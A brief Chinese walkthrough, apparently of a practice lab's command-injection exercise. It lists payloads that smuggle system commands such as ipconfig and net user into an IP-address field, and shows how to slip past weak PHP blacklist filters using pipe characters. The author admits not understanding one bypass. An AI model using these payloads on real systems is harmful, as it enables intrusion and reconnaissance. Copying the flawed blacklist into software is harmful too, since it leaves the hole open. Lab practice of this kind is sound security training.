命令注入即注入并执行攻击者指定的命令
LOW
1 输入IP地址,出现乱码
2打开如下图所示文件,将utf-8全部替换为gb2312(区分大小写)
3 重新输入IP地址
4 之后可进行命令注入
eg:
127.0.0.1&ipconfig
127.0.0.1&systeminfo
127.0.0.1&dir
127.0.0.1&net user
(各种命令就不一一解释了)
MEDIUM
源码中进行了转义
$substitutions = array(
'&&' => '',
';' => '',
);
// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
所以使用“&&”,“;”以外的符号就可以了
HIGH
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);
// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
可用
127.0.0.1 || ipconfig
(||,无空格)
(我也不太明白这个为什么可以用)
也可用
127.0.0.1|ipconfig